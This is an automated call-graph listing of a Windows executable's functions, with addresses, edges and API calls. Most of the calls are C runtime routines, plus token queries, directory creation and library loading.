16861 7ff6fb1fa5d8 _get_daylight 11 API calls 16860->16861 16862 7ff6fb1f4497 16861->16862 16863 7ff6fb1e27df 16862->16863 16864 7ff6fb1fdea8 _get_daylight 11 API calls 16862->16864 16867 7ff6fb1f44d7 16862->16867 16863->16801 16865 7ff6fb1f44cc 16864->16865 16866 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16865->16866 16866->16867 16867->16863 17010 7ff6fb1fdf30 16867->17010 16870 7ff6fb1f9c10 _isindst 17 API calls 16871 7ff6fb1f451c 16870->16871 16873 7ff6fb1f1f6e 16872->16873 16874 7ff6fb1f1f5e 16872->16874 16875 7ff6fb1f1f77 16873->16875 16879 7ff6fb1f1fa5 16873->16879 16878 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16874->16878 16876 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16875->16876 16877 7ff6fb1f1f9d 16876->16877 16877->16849 16877->16854 16877->16855 16877->16858 16878->16877 16879->16874 16879->16877 16880 7ff6fb1f3ae0 45 API calls 16879->16880 16881 7ff6fb1f2254 16879->16881 16886 7ff6fb1f28c0 16879->16886 16912 7ff6fb1f2588 16879->16912 16942 7ff6fb1f1e10 16879->16942 16880->16879 16884 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16881->16884 16884->16874 16887 7ff6fb1f2975 16886->16887 16888 7ff6fb1f2902 16886->16888 16891 7ff6fb1f297a 16887->16891 16892 7ff6fb1f29cf 16887->16892 16889 7ff6fb1f299f 16888->16889 16890 7ff6fb1f2908 16888->16890 16959 7ff6fb1f0e70 16889->16959 16894 7ff6fb1f290d 16890->16894 16898 7ff6fb1f29de 16890->16898 16895 7ff6fb1f29af 16891->16895 16897 7ff6fb1f297c 16891->16897 16892->16889 16892->16898 16910 7ff6fb1f2938 16892->16910 16901 7ff6fb1f2950 16894->16901 16903 7ff6fb1f291d 16894->16903 16894->16910 16966 7ff6fb1f0a60 16895->16966 16900 7ff6fb1f298b 16897->16900 16897->16903 16911 7ff6fb1f2a0d 16898->16911 16973 7ff6fb1f1280 16898->16973 16900->16889 16904 7ff6fb1f2990 16900->16904 16901->16911 16955 7ff6fb1f36e0 16901->16955 16903->16911 16945 7ff6fb1f3224 16903->16945 16907 7ff6fb1f3878 37 API calls 16904->16907 16904->16911 16906 7ff6fb1eb870 
_log10_special 8 API calls 16908 7ff6fb1f2ca3 16906->16908 16907->16910 16908->16879 16910->16911 16980 7ff6fb1fdb68 16910->16980 16911->16906 16913 7ff6fb1f2593 16912->16913 16914 7ff6fb1f25a9 16912->16914 16915 7ff6fb1f2975 16913->16915 16916 7ff6fb1f2902 16913->16916 16918 7ff6fb1f25e7 16913->16918 16917 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16914->16917 16914->16918 16921 7ff6fb1f29cf 16915->16921 16922 7ff6fb1f297a 16915->16922 16919 7ff6fb1f299f 16916->16919 16920 7ff6fb1f2908 16916->16920 16917->16918 16918->16879 16926 7ff6fb1f0e70 38 API calls 16919->16926 16929 7ff6fb1f290d 16920->16929 16932 7ff6fb1f29de 16920->16932 16921->16919 16921->16932 16937 7ff6fb1f2938 16921->16937 16923 7ff6fb1f29af 16922->16923 16924 7ff6fb1f297c 16922->16924 16927 7ff6fb1f0a60 38 API calls 16923->16927 16925 7ff6fb1f291d 16924->16925 16930 7ff6fb1f298b 16924->16930 16928 7ff6fb1f3224 47 API calls 16925->16928 16941 7ff6fb1f2a0d 16925->16941 16926->16937 16927->16937 16928->16937 16929->16925 16931 7ff6fb1f2950 16929->16931 16929->16937 16930->16919 16934 7ff6fb1f2990 16930->16934 16935 7ff6fb1f36e0 47 API calls 16931->16935 16931->16941 16933 7ff6fb1f1280 38 API calls 16932->16933 16932->16941 16933->16937 16938 7ff6fb1f3878 37 API calls 16934->16938 16934->16941 16935->16937 16936 7ff6fb1eb870 _log10_special 8 API calls 16939 7ff6fb1f2ca3 16936->16939 16940 7ff6fb1fdb68 47 API calls 16937->16940 16937->16941 16938->16937 16939->16879 16940->16937 16941->16936 16993 7ff6fb1f0034 16942->16993 16946 7ff6fb1f3246 16945->16946 16947 7ff6fb1efea0 12 API calls 16946->16947 16948 7ff6fb1f328e 16947->16948 16949 7ff6fb1fd880 46 API calls 16948->16949 16950 7ff6fb1f3361 16949->16950 16951 7ff6fb1f3ae0 45 API calls 16950->16951 16954 7ff6fb1f3383 16950->16954 16951->16954 16952 7ff6fb1f340c 16952->16910 16952->16952 16953 7ff6fb1f3ae0 45 API calls 16953->16952 16954->16952 16954->16953 16954->16954 16956 7ff6fb1f36f8 16955->16956 16958 7ff6fb1f3760 16955->16958 16957 
7ff6fb1fdb68 47 API calls 16956->16957 16956->16958 16957->16958 16958->16910 16960 7ff6fb1f0ea3 16959->16960 16961 7ff6fb1f0ed2 16960->16961 16963 7ff6fb1f0f8f 16960->16963 16962 7ff6fb1efea0 12 API calls 16961->16962 16965 7ff6fb1f0f0f 16961->16965 16962->16965 16964 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16963->16964 16964->16965 16965->16910 16967 7ff6fb1f0a93 16966->16967 16968 7ff6fb1f0ac2 16967->16968 16970 7ff6fb1f0b7f 16967->16970 16969 7ff6fb1efea0 12 API calls 16968->16969 16972 7ff6fb1f0aff 16968->16972 16969->16972 16971 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16970->16971 16971->16972 16972->16910 16974 7ff6fb1f12b3 16973->16974 16975 7ff6fb1f12e2 16974->16975 16978 7ff6fb1f139f 16974->16978 16976 7ff6fb1f131f 16975->16976 16977 7ff6fb1efea0 12 API calls 16975->16977 16976->16910 16977->16976 16979 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16978->16979 16979->16976 16981 7ff6fb1fdb90 16980->16981 16982 7ff6fb1fdbd5 16981->16982 16983 7ff6fb1f3ae0 45 API calls 16981->16983 16986 7ff6fb1fdb95 memcpy_s 16981->16986 16989 7ff6fb1fdbbe memcpy_s 16981->16989 16982->16986 16982->16989 16990 7ff6fb1ffaf8 16982->16990 16983->16982 16984 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16984->16986 16986->16910 16989->16984 16989->16986 16992 7ff6fb1ffb1c WideCharToMultiByte 16990->16992 16994 7ff6fb1f0073 16993->16994 16995 7ff6fb1f0061 16993->16995 16998 7ff6fb1f0080 16994->16998 17001 7ff6fb1f00bd 16994->17001 16996 7ff6fb1f43f4 _get_daylight 11 API calls 16995->16996 16997 7ff6fb1f0066 16996->16997 16999 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16997->16999 17000 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16998->17000 17003 7ff6fb1f0071 16999->17003 17000->17003 17002 7ff6fb1f0166 17001->17002 17004 7ff6fb1f43f4 _get_daylight 11 API calls 17001->17004 17002->17003 17005 7ff6fb1f43f4 _get_daylight 11 API calls 17002->17005 17003->16879 17007 7ff6fb1f015b 17004->17007 17006 7ff6fb1f0210 17005->17006 
17008 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17006->17008 17009 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17007->17009 17008->17003 17009->17002 17013 7ff6fb1fdf4d 17010->17013 17011 7ff6fb1fdf52 17012 7ff6fb1f43f4 _get_daylight 11 API calls 17011->17012 17016 7ff6fb1f44fd 17011->17016 17018 7ff6fb1fdf5c 17012->17018 17013->17011 17014 7ff6fb1fdf9c 17013->17014 17013->17016 17014->17016 17017 7ff6fb1f43f4 _get_daylight 11 API calls 17014->17017 17015 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17015->17016 17016->16863 17016->16870 17017->17018 17018->17015 17020 7ff6fb1f7555 17019->17020 17021 7ff6fb1f7568 17019->17021 17022 7ff6fb1f43f4 _get_daylight 11 API calls 17020->17022 17029 7ff6fb1f71cc 17021->17029 17024 7ff6fb1f755a 17022->17024 17027 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17024->17027 17026 7ff6fb1f7566 17026->16020 17027->17026 17036 7ff6fb1ff5e8 EnterCriticalSection 17029->17036 17038 7ff6fb1e7c13 __std_exception_destroy 17037->17038 17039 7ff6fb1e7b91 GetTokenInformation 17037->17039 17042 7ff6fb1e7c2c 17038->17042 17043 7ff6fb1e7c26 CloseHandle 17038->17043 17040 7ff6fb1e7bb2 GetLastError 17039->17040 17041 7ff6fb1e7bbd 17039->17041 17040->17038 17040->17041 17041->17038 17044 7ff6fb1e7bd9 GetTokenInformation 17041->17044 17042->16029 17043->17042 17044->17038 17045 7ff6fb1e7bfc 17044->17045 17045->17038 17046 7ff6fb1e7c06 ConvertSidToStringSidW 17045->17046 17046->17038 17048 7ff6fb1e297a 17047->17048 17332 7ff6fb1e3f70 108 API calls 17331->17332 17333 7ff6fb1e1463 17332->17333 17334 7ff6fb1e146b 17333->17334 17335 7ff6fb1e148c 17333->17335 17336 7ff6fb1e25f0 53 API calls 17334->17336 17337 7ff6fb1ef9f4 73 API calls 17335->17337 17338 7ff6fb1e147b 17336->17338 17339 7ff6fb1e14a1 17337->17339 17338->16088 17340 7ff6fb1e14a5 17339->17340 17341 7ff6fb1e14c1 17339->17341 17342 7ff6fb1e2760 53 API calls 17340->17342 17343 7ff6fb1e14f1 17341->17343 17344 7ff6fb1e14d1 17341->17344 17350 7ff6fb1e14bc 
__std_exception_destroy 17342->17350 17347 7ff6fb1e14f7 17343->17347 17352 7ff6fb1e150a 17343->17352 17345 7ff6fb1e2760 53 API calls 17344->17345 17345->17350 17346 7ff6fb1ef36c 74 API calls 17348 7ff6fb1e1584 17346->17348 17355 7ff6fb1e11f0 17347->17355 17348->16088 17350->17346 17351 7ff6fb1ef6bc _fread_nolock 53 API calls 17351->17352 17352->17350 17352->17351 17353 7ff6fb1e1596 17352->17353 17354 7ff6fb1e2760 53 API calls 17353->17354 17354->17350 17356 7ff6fb1e1248 17355->17356 17357 7ff6fb1e124f 17356->17357 17358 7ff6fb1e1277 17356->17358 17359 7ff6fb1e25f0 53 API calls 17357->17359 17361 7ff6fb1e1291 17358->17361 17362 7ff6fb1e12ad 17358->17362 17360 7ff6fb1e1262 17359->17360 17360->17350 17363 7ff6fb1e2760 53 API calls 17361->17363 17364 7ff6fb1e12bf 17362->17364 17367 7ff6fb1e12db memcpy_s 17362->17367 17368 7ff6fb1e12a8 __std_exception_destroy 17363->17368 17365 7ff6fb1e2760 53 API calls 17364->17365 17365->17368 17366 7ff6fb1ef6bc _fread_nolock 53 API calls 17366->17367 17367->17366 17367->17368 17369 7ff6fb1e139f 17367->17369 17372 7ff6fb1ef430 37 API calls 17367->17372 17373 7ff6fb1efdfc 17367->17373 17368->17350 17372->17367 17393 7ff6fb1e3f1a 17392->17393 17394 7ff6fb1e86b0 2 API calls 17393->17394 17395 7ff6fb1e3f3f 17394->17395 17396 7ff6fb1eb870 _log10_special 8 API calls 17395->17396 17397 7ff6fb1e3f67 17396->17397 17397->16117 17399 7ff6fb1e753e 17398->17399 17400 7ff6fb1e7662 17399->17400 17401 7ff6fb1e1bf0 49 API calls 17399->17401 17402 7ff6fb1eb870 _log10_special 8 API calls 17400->17402 17407 7ff6fb1e75c5 17401->17407 17403 7ff6fb1e7693 17402->17403 17403->16117 17404 7ff6fb1e1bf0 49 API calls 17404->17407 17405 7ff6fb1e3f10 10 API calls 17405->17407 17406 7ff6fb1e761b 17408 7ff6fb1e86b0 2 API calls 17406->17408 17407->17400 17407->17404 17407->17405 17407->17406 17409 7ff6fb1e7633 CreateDirectoryW 17408->17409 17409->17400 17409->17407 17411 7ff6fb1e15d3 17410->17411 17412 7ff6fb1e15f7 17410->17412 17499 7ff6fb1e1050 17411->17499 17413 
7ff6fb1e3f70 108 API calls 17412->17413 17415 7ff6fb1e160b 17413->17415 17418 7ff6fb1e1613 17415->17418 17419 7ff6fb1e163b 17415->17419 17416 7ff6fb1e15ee 17416->16117 17417 7ff6fb1e15d8 17417->17416 17420 7ff6fb1e25f0 53 API calls 17417->17420 17421 7ff6fb1e2760 53 API calls 17418->17421 17422 7ff6fb1e3f70 108 API calls 17419->17422 17420->17416 17423 7ff6fb1e162a 17421->17423 17424 7ff6fb1e164f 17422->17424 17423->16117 17425 7ff6fb1e1671 17424->17425 17426 7ff6fb1e1657 17424->17426 17427 7ff6fb1ef9f4 73 API calls 17425->17427 17428 7ff6fb1e25f0 53 API calls 17426->17428 17429 7ff6fb1e1686 17427->17429 17430 7ff6fb1e1667 17428->17430 17450 7ff6fb1e694b 17448->17450 17451 7ff6fb1e6904 17448->17451 17450->16117 17451->17450 17538 7ff6fb1f4250 17451->17538 17453 7ff6fb1e3b51 17452->17453 17454 7ff6fb1e3e90 49 API calls 17453->17454 17455 7ff6fb1e3b8b 17454->17455 17456 7ff6fb1e3e90 49 API calls 17455->17456 17457 7ff6fb1e3b9b 17456->17457 17458 7ff6fb1e3bbd 17457->17458 17459 7ff6fb1e3bec 17457->17459 17569 7ff6fb1e3ac0 17458->17569 17461 7ff6fb1e3ac0 51 API calls 17459->17461 17462 7ff6fb1e3bea 17461->17462 17497 7ff6fb1e1bf0 49 API calls 17496->17497 17498 7ff6fb1e3e24 17497->17498 17498->16117 17500 7ff6fb1e3f70 108 API calls 17499->17500 17501 7ff6fb1e108b 17500->17501 17502 7ff6fb1e1093 17501->17502 17503 7ff6fb1e10a8 17501->17503 17505 7ff6fb1e25f0 53 API calls 17502->17505 17504 7ff6fb1ef9f4 73 API calls 17503->17504 17506 7ff6fb1e10bd 17504->17506 17510 7ff6fb1e10a3 __std_exception_destroy 17505->17510 17507 7ff6fb1e10c1 17506->17507 17508 7ff6fb1e10dd 17506->17508 17510->17417 17539 7ff6fb1f425d 17538->17539 17540 7ff6fb1f428a 17538->17540 17541 7ff6fb1f43f4 _get_daylight 11 API calls 17539->17541 17542 7ff6fb1f4214 17539->17542 17543 7ff6fb1f42ad 17540->17543 17546 7ff6fb1f42c9 17540->17546 17544 7ff6fb1f4267 17541->17544 17542->17451 17545 7ff6fb1f43f4 _get_daylight 11 API calls 17543->17545 17547 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 
17544->17547 17548 7ff6fb1f42b2 17545->17548 17553 7ff6fb1f4178 17546->17553 17550 7ff6fb1f4272 17547->17550 17551 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17548->17551 17550->17451 17552 7ff6fb1f42bd 17551->17552 17552->17451 17554 7ff6fb1f419c 17553->17554 17560 7ff6fb1f4197 17553->17560 17555 7ff6fb1fa460 __GetCurrentState 45 API calls 17554->17555 17554->17560 17556 7ff6fb1f41b7 17555->17556 17561 7ff6fb1fcc94 17556->17561 17560->17552 17570 7ff6fb1e3ae6 17569->17570 17571 7ff6fb1f3ca4 49 API calls 17570->17571 17633 7ff6fb1ebe12 RtlLookupFunctionEntry 17632->17633 17634 7ff6fb1ebc2b 17633->17634 17635 7ff6fb1ebe28 RtlVirtualUnwind 17633->17635 17636 7ff6fb1ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17634->17636 17635->17633 17635->17634 17638 7ff6fb1f51d8 17637->17638 17639 7ff6fb1f51fe 17638->17639 17642 7ff6fb1f5231 17638->17642 17640 7ff6fb1f43f4 _get_daylight 11 API calls 17639->17640 17641 7ff6fb1f5203 17640->17641 17643 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17641->17643 17644 7ff6fb1f5244 17642->17644 17645 7ff6fb1f5237 17642->17645 17646 7ff6fb1e3fc6 17643->17646 17656 7ff6fb1f9f38 17644->17656 17647 7ff6fb1f43f4 _get_daylight 11 API calls 17645->17647 17646->16149 17647->17646 17669 7ff6fb1ff5e8 EnterCriticalSection 17656->17669 18030 7ff6fb1f6c08 18029->18030 18033 7ff6fb1f66e4 18030->18033 18032 7ff6fb1f6c21 18032->16159 18034 7ff6fb1f672e 18033->18034 18035 7ff6fb1f66ff 18033->18035 18043 7ff6fb1f477c EnterCriticalSection 18034->18043 18036 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 18035->18036 18042 7ff6fb1f671f 18036->18042 18042->18032 18045 7ff6fb1ef163 18044->18045 18046 7ff6fb1ef191 18044->18046 18047 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 18045->18047 18053 7ff6fb1ef183 18046->18053 18054 7ff6fb1f477c EnterCriticalSection 18046->18054 18047->18053 18053->16163 18056 7ff6fb1e86b0 2 API calls 18055->18056 18057 7ff6fb1e81b4 LoadLibraryExW 
18056->18057 18058 7ff6fb1e81d3 __std_exception_destroy 18057->18058 18058->16193 18060 7ff6fb1e6ef3 GetProcAddress 18059->18060 18061 7ff6fb1e6ec9 18059->18061 18060->18061 18062 7ff6fb1e6f18 GetProcAddress 18060->18062 18064 7ff6fb1e29e0 51 API calls 18061->18064 18062->18061 18063 7ff6fb1e6f3d GetProcAddress 18062->18063 18063->18061 18066 7ff6fb1e6ee3 18064->18066 18066->16199 18125 7ff6fb1e5b05 18124->18125 18126 7ff6fb1e1bf0 49 API calls 18125->18126 18127 7ff6fb1e5b41 18126->18127 18128 7ff6fb1e5b4a 18127->18128 18129 7ff6fb1e5b6d 18127->18129 18130 7ff6fb1e25f0 53 API calls 18128->18130 18131 7ff6fb1e3fe0 49 API calls 18129->18131 18147 7ff6fb1e5b63 18130->18147 18132 7ff6fb1e5b85 18131->18132 18133 7ff6fb1e5ba3 18132->18133 18134 7ff6fb1e25f0 53 API calls 18132->18134 18135 7ff6fb1e3f10 10 API calls 18133->18135 18134->18133 18138 7ff6fb1e5bad 18135->18138 18136 7ff6fb1eb870 _log10_special 8 API calls 18137 7ff6fb1e308e 18136->18137 18137->16228 18155 7ff6fb1e5c80 18137->18155 18139 7ff6fb1e5bbb 18138->18139 18140 7ff6fb1e81a0 3 API calls 18138->18140 18141 7ff6fb1e3fe0 49 API calls 18139->18141 18140->18139 18142 7ff6fb1e5bd4 18141->18142 18143 7ff6fb1e5bf9 18142->18143 18144 7ff6fb1e5bd9 18142->18144 18146 7ff6fb1e81a0 3 API calls 18143->18146 18145 7ff6fb1e25f0 53 API calls 18144->18145 18145->18147 18148 7ff6fb1e5c06 18146->18148 18147->18136 18294 7ff6fb1e4c80 18155->18294 18157 7ff6fb1e5cba 18158 7ff6fb1e5cd3 18157->18158 18159 7ff6fb1e5cc2 18157->18159 18301 7ff6fb1e4450 18158->18301 18160 7ff6fb1e25f0 53 API calls 18159->18160 18296 7ff6fb1e4cac 18294->18296 18295 7ff6fb1e4cb4 18295->18157 18296->18295 18299 7ff6fb1e4e54 18296->18299 18332 7ff6fb1f5db4 18296->18332 18297 7ff6fb1e5017 __std_exception_destroy 18297->18157 18298 7ff6fb1e4180 47 API calls 18298->18299 18299->18297 18299->18298 18333 7ff6fb1f5de4 18332->18333 18336 7ff6fb1f52b0 18333->18336 18337 7ff6fb1f52f3 18336->18337 18338 7ff6fb1f52e1 18336->18338 18340 7ff6fb1f533d 18337->18340 
18342 7ff6fb1f5300 18337->18342 18339 7ff6fb1f43f4 _get_daylight 11 API calls 18338->18339 18412->16236 18414 7ff6fb1fa460 __GetCurrentState 45 API calls 18413->18414 18415 7ff6fb1f96f1 18414->18415 18418 7ff6fb1f9814 18415->18418 18427 7ff6fb202960 18418->18427 18453 7ff6fb202918 18427->18453 18458 7ff6fb1ff5e8 EnterCriticalSection 18453->18458 19453 7ff6fb1ffbd8 19454 7ff6fb1ffbfc 19453->19454 19457 7ff6fb1ffc0c 19453->19457 19455 7ff6fb1f43f4 _get_daylight 11 API calls 19454->19455 19456 7ff6fb1ffc01 19455->19456 19458 7ff6fb1ffeec 19457->19458 19459 7ff6fb1ffc2e 19457->19459 19460 7ff6fb1f43f4 _get_daylight 11 API calls 19458->19460 19463 7ff6fb1ffc4f 19459->19463 19584 7ff6fb200294 19459->19584 19461 7ff6fb1ffef1 19460->19461 19462 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19461->19462 19462->19456 19465 7ff6fb1ffcc1 19463->19465 19467 7ff6fb1ffc75 19463->19467 19471 7ff6fb1ffcb5 19463->19471 19469 7ff6fb1fdea8 _get_daylight 11 API calls 19465->19469 19482 7ff6fb1ffc84 19465->19482 19466 7ff6fb1ffd6e 19478 7ff6fb1ffd8b 19466->19478 19483 7ff6fb1ffddd 19466->19483 19599 7ff6fb1f89d8 19467->19599 19472 7ff6fb1ffcd7 19469->19472 19471->19466 19471->19482 19605 7ff6fb20643c 19471->19605 19475 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19472->19475 19474 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19474->19456 19479 7ff6fb1ffce5 19475->19479 19476 7ff6fb1ffc7f 19480 7ff6fb1f43f4 _get_daylight 11 API calls 19476->19480 19477 7ff6fb1ffc9d 19477->19471 19485 7ff6fb200294 45 API calls 19477->19485 19481 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19478->19481 19479->19471 19479->19482 19487 7ff6fb1fdea8 _get_daylight 11 API calls 19479->19487 19480->19482 19484 7ff6fb1ffd94 19481->19484 19482->19474 19483->19482 19486 7ff6fb2026ec 40 API calls 19483->19486 19494 7ff6fb1ffd99 19484->19494 19641 7ff6fb2026ec 19484->19641 19485->19471 19488 
7ff6fb1ffe1a 19486->19488 19490 7ff6fb1ffd07 19487->19490 19491 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19488->19491 19495 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19490->19495 19496 7ff6fb1ffe24 19491->19496 19492 7ff6fb1ffdc5 19497 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19492->19497 19493 7ff6fb1ffee0 19498 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19493->19498 19494->19493 19499 7ff6fb1fdea8 _get_daylight 11 API calls 19494->19499 19495->19471 19496->19482 19496->19494 19497->19494 19498->19456 19500 7ff6fb1ffe68 19499->19500 19501 7ff6fb1ffe70 19500->19501 19502 7ff6fb1ffe79 19500->19502 19503 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19501->19503 19504 7ff6fb1f97b4 __std_exception_copy 37 API calls 19502->19504 19505 7ff6fb1ffe77 19503->19505 19506 7ff6fb1ffe88 19504->19506 19510 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19505->19510 19507 7ff6fb1ffe90 19506->19507 19508 7ff6fb1fff1b 19506->19508 19650 7ff6fb206554 19507->19650 19509 7ff6fb1f9c10 _isindst 17 API calls 19508->19509 19513 7ff6fb1fff2f 19509->19513 19510->19456 19516 7ff6fb1fff58 19513->19516 19522 7ff6fb1fff68 19513->19522 19514 7ff6fb1ffed8 19519 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19514->19519 19515 7ff6fb1ffeb7 19517 7ff6fb1f43f4 _get_daylight 11 API calls 19515->19517 19518 7ff6fb1f43f4 _get_daylight 11 API calls 19516->19518 19520 7ff6fb1ffebc 19517->19520 19546 7ff6fb1fff5d 19518->19546 19519->19493 19521 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19520->19521 19521->19505 19523 7ff6fb20024b 19522->19523 19524 7ff6fb1fff8a 19522->19524 19525 7ff6fb1f43f4 _get_daylight 11 API calls 19523->19525 19527 7ff6fb1fffa7 19524->19527 19669 7ff6fb20037c 19524->19669 19526 7ff6fb200250 19525->19526 19529 7ff6fb1f9c58 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19526->19529 19530 7ff6fb20001b 19527->19530 19532 7ff6fb1fffcf 19527->19532 19536 7ff6fb20000f 19527->19536 19529->19546 19534 7ff6fb200043 19530->19534 19537 7ff6fb1fdea8 _get_daylight 11 API calls 19530->19537 19552 7ff6fb1fffde 19530->19552 19531 7ff6fb2000ce 19545 7ff6fb2000eb 19531->19545 19553 7ff6fb20013e 19531->19553 19684 7ff6fb1f8a14 19532->19684 19534->19536 19539 7ff6fb1fdea8 _get_daylight 11 API calls 19534->19539 19534->19552 19536->19531 19536->19552 19690 7ff6fb2062fc 19536->19690 19541 7ff6fb200035 19537->19541 19544 7ff6fb200065 19539->19544 19540 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19540->19546 19547 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19541->19547 19542 7ff6fb1fffd9 19548 7ff6fb1f43f4 _get_daylight 11 API calls 19542->19548 19543 7ff6fb1ffff7 19543->19536 19551 7ff6fb20037c 45 API calls 19543->19551 19549 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19544->19549 19550 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19545->19550 19547->19534 19548->19552 19549->19536 19554 7ff6fb2000f4 19550->19554 19551->19536 19552->19540 19553->19552 19555 7ff6fb2026ec 40 API calls 19553->19555 19558 7ff6fb2026ec 40 API calls 19554->19558 19561 7ff6fb2000fa 19554->19561 19556 7ff6fb20017c 19555->19556 19557 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19556->19557 19559 7ff6fb200186 19557->19559 19562 7ff6fb200126 19558->19562 19559->19552 19559->19561 19560 7ff6fb20023f 19564 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19560->19564 19561->19560 19565 7ff6fb1fdea8 _get_daylight 11 API calls 19561->19565 19563 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19562->19563 19563->19561 19564->19546 19566 7ff6fb2001cb 19565->19566 19567 7ff6fb2001d3 19566->19567 19568 7ff6fb2001dc 
19566->19568 19569 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19567->19569 19570 7ff6fb1ff784 37 API calls 19568->19570 19571 7ff6fb2001da 19569->19571 19572 7ff6fb2001ea 19570->19572 19578 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19571->19578 19573 7ff6fb2001f2 SetEnvironmentVariableW 19572->19573 19574 7ff6fb20027f 19572->19574 19575 7ff6fb200237 19573->19575 19576 7ff6fb200216 19573->19576 19577 7ff6fb1f9c10 _isindst 17 API calls 19574->19577 19581 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19575->19581 19579 7ff6fb1f43f4 _get_daylight 11 API calls 19576->19579 19580 7ff6fb200293 19577->19580 19578->19546 19582 7ff6fb20021b 19579->19582 19581->19560 19583 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19582->19583 19583->19571 19585 7ff6fb2002c9 19584->19585 19592 7ff6fb2002b1 19584->19592 19586 7ff6fb1fdea8 _get_daylight 11 API calls 19585->19586 19595 7ff6fb2002ed 19586->19595 19587 7ff6fb200372 19589 7ff6fb1f9814 __GetCurrentState 45 API calls 19587->19589 19588 7ff6fb20034e 19591 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19588->19591 19590 7ff6fb200378 19589->19590 19591->19592 19592->19463 19593 7ff6fb1fdea8 _get_daylight 11 API calls 19593->19595 19594 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19594->19595 19595->19587 19595->19588 19595->19593 19595->19594 19596 7ff6fb1f97b4 __std_exception_copy 37 API calls 19595->19596 19597 7ff6fb20035d 19595->19597 19596->19595 19598 7ff6fb1f9c10 _isindst 17 API calls 19597->19598 19598->19587 19600 7ff6fb1f89e8 19599->19600 19603 7ff6fb1f89f1 19599->19603 19600->19603 19714 7ff6fb1f84b0 19600->19714 19603->19476 19603->19477 19606 7ff6fb205564 19605->19606 19607 7ff6fb206449 19605->19607 19608 7ff6fb205571 19606->19608 19612 7ff6fb2055a7 19606->19612 19609 7ff6fb1f4178 45 API calls 19607->19609 19610 7ff6fb1f43f4 _get_daylight 
11 API calls 19608->19610 19625 7ff6fb205518 19608->19625 19614 7ff6fb20647d 19609->19614 19615 7ff6fb20557b 19610->19615 19611 7ff6fb2055d1 19616 7ff6fb1f43f4 _get_daylight 11 API calls 19611->19616 19612->19611 19617 7ff6fb2055f6 19612->19617 19613 7ff6fb206482 19613->19471 19614->19613 19618 7ff6fb206493 19614->19618 19621 7ff6fb2064aa 19614->19621 19619 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19615->19619 19620 7ff6fb2055d6 19616->19620 19626 7ff6fb1f4178 45 API calls 19617->19626 19632 7ff6fb2055e1 19617->19632 19622 7ff6fb1f43f4 _get_daylight 11 API calls 19618->19622 19623 7ff6fb205586 19619->19623 19624 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19620->19624 19628 7ff6fb2064b4 19621->19628 19629 7ff6fb2064c6 19621->19629 19627 7ff6fb206498 19622->19627 19623->19471 19624->19632 19625->19471 19626->19632 19633 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19627->19633 19634 7ff6fb1f43f4 _get_daylight 11 API calls 19628->19634 19630 7ff6fb2064ee 19629->19630 19631 7ff6fb2064d7 19629->19631 19940 7ff6fb20825c 19630->19940 19931 7ff6fb2055b4 19631->19931 19632->19471 19633->19613 19637 7ff6fb2064b9 19634->19637 19639 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 19637->19639 19639->19613 19640 7ff6fb1f43f4 _get_daylight 11 API calls 19640->19613 